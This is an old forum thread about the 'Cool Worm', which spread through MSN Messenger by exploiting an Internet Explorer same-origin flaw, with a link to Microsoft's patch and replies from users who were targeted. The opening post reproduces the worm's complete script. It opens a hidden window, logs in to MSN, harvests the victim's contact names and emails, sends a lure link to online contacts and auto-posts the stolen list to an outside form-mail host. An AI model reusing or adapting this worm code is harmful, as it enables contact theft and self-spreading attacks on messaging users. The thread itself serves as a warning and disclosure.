Hey all,


MSN messenger, the wellknown im software from our friend Bill G. has another vulnerability...

http://www.theregister.co.uk/content/4/24059.html


A relatively benign but effective Internet worm attacked users of Microsoft's MSN Messenger service Wednesday by exploiting a bug in Internet Explorer that was reported last year, but was only recently patched by Microsoft.

The Cool Worm spreads through the Microsoft Internet Explorer Same Origin Policy Violation vulnerability, reported by a security researcher called "ThePull" on December 19th, which went unacknowledged and unrepaired by Microsoft for months.


The worm code look like this:

<Script>

var msnWin;
var msnList;
var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn.html";
//var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn (http://denniz.com/valentijn.html)";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "
";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>

<body onload="Go()">

<form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.xxxxxxxxx.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="xxxxxxxxxxxxxxxxx@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>

the patch is here:

http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp

Yup. Someone tried to hit me with a variant of this....I've got the code on disk and sent a nice message to Microsoft and the guys isp. :P

Someone tried to hit me too..

luckily I was msn-ing under linux, so no harm done...

www.linux-messenger.tk (the JinXed edition ; )

Good thread jinx...

Some ***** sent me the virus too...
thanks for the patch...

I'm realy sorry for you homer.

I hope there was no real damage done..

but in the future be carefull with url's ppl send u.

Agreed - good post. Just for the hell of it I cut and pasted this baby and threw it at my av pkgs - they got it right away. Just testing heheh

That worm was probably writen by DHF (Dutch HAck force) (A bunch of Ass-0, They took down my ISP for 2weeks once..... )
The worm Deffinatly originated in Holland...... (It contains a Message In Dutch)

Ne way's.... I hope some one will do something about the DHF, coz they ain't exactly White-Hatters.

Nice Post though......I don't use MSN, but my friends (and enemies - HAHAHA) do...

Tanx

My version (the one I posted) orriginates by an casema (cable internet) luser..

I gave all the info in a nice mail to the ISP (casema.nl)

There are allso english versions around.

I use casema, It an absoluta Pile of ----
Probably DHF then, They use them for security since Casema can't tell it's Elbow from it's
Arse-0.....

bwt: Jinx..... U in holland??